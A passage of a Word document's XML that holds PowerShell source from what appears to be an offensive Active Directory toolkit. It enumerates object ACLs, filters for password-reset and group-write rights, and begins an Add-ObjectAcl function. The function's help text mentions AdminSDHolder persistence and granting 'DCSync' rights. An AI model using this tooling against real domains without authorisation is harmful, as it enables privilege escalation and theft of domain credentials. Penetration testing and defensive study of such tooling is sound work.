        <w:t xml:space="preserve">        if($ResolveGUIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C4E4B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GUIDs = Get-GUIDMap -Domain $Domain -DomainController $DomainController -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60866524" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE3062C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067095A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="282944EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52458F69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="519B9725" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Searcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590244C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47155412" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($SamAccountName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1846FED9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Searcher.filter="(&amp;(samaccountname=$SamAccountName)(name=$Name)(distinguishedname=$DistinguishedName)$Filter)"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB892B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBA3B9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E061F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Searcher.filter="(&amp;(name=$Name)(distinguishedname=$DistinguishedName)$Filter)"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8DB86A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE89C98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CC1DC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699F3BB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results = $Searcher.FindAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC31FA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results | Where-Object {$_} | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A1C4F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Object = [adsi]($_.path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D671B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="163965EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Object.distinguishedname) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33081D40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Access = $Object.PsBase.ObjectSecurity.access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5956E628" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Access | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C8786D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C0DD05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FEBC030" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if($Object.objectsid[0]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2238D432" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $S = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79314512" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7233CB9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4816F41E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $S = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339FF1A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A06437A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D574E72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $_ | Add-Member NoteProperty 'ObjectSID' $S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19697549" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC52D62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B0DD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FE2FFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33840308" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($RightsFilter) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A752923" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GuidFilter = Switch ($RightsFilter) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB81EC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            "ResetPassword" { "00299570-246d-11d0-a768-00aa006e0529" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518068F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            "WriteMembers" { "bf9679c0-0de6-11d0-a285-00aa003049e2" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647B4EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            Default { "00000000-0000-0000-0000-000000000000"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F4E933" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A32218" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($_.ObjectType -eq $GuidFilter) { $_ }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225FC105" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7CAF89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206708FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD0B32B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0076499F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F319CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($GUIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D319A6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # if we're resolving GUIDs, map them them to the resolved hash table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE1B71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $AclProperties = @{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296FA1B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $_.psobject.properties | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B668F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if( ($_.Name -eq 'ObjectType') -or ($_.Name -eq 'InheritedObjectType') ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BA5290" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FE5D9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $AclProperties[$_.Name] = $GUIDS[$_.Value.toString()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A4141" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A861FB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667ADBA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                    $AclProperties[$_.Name] = $_.Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1248CC3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD019B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376C431" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E514F4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $AclProperties[$_.Name] = $_.Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C7CCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472C2B39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0482FB62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        New-Object -TypeName PSObject -Property $AclProperties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF291A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C99BB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else { $_ }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C67873B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABBD4C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Results.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DE90CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $Searcher.dispose()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F665016" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631B0B45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8C4783" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Warning $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A02037" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1100BD98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64761B00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6C457" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D70251" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D80A68E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B827A37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Add-ObjectAcl {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479767A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167012B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648AADED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="373F46D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Adds an ACL for a specific active directory object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118CCB72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61659021" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10573947" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            https://adsecurity.org/?p=1906</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D12DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B09795C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ACE setting method adapted from https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25818694" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7514B288" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'ResetPassword' doesn't need to know the user's current password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611F249" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        'WriteMembers' allows for the modification of group membership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69889D21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3900E72F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TargetSamAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B1DB00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C2B828A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Target object name to filter for.        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3BC592" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3C1738EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TargetName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF8921" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D6C9732" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Target object name to filter for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F13BB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="068BF00A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TargetDistinguishedName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418450FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C235A25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Target object distinguished name to filter for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4345F051" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D213A13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TargetFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBDE543" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="461106A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use to find a target, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1638B07A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17D6E535" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TargetADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23CE2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3AA8E5AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source for the target, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7FA4BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47DFDBC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TargetADSprefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF112B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6142A172" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Prefix to set for the target searcher (like "CN=Sites,CN=Configuration")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543871F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14784176" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PrincipalSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6473F899" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5014F047" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The SID of the principal object to add for access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E52C6CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58A1C612" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PrincipalName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51387655" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E2073E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The name of the principal object to add for access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0AE9F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="43BD7C9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER PrincipalSamAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5762B0D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0026C9C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The samAccountName of the principal object to add for access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B169394" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C2883E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19586BB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7029138F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Rights to add for the principal, "All","ResetPassword","WriteMembers","DCSync"</w:t>
      </w:r>
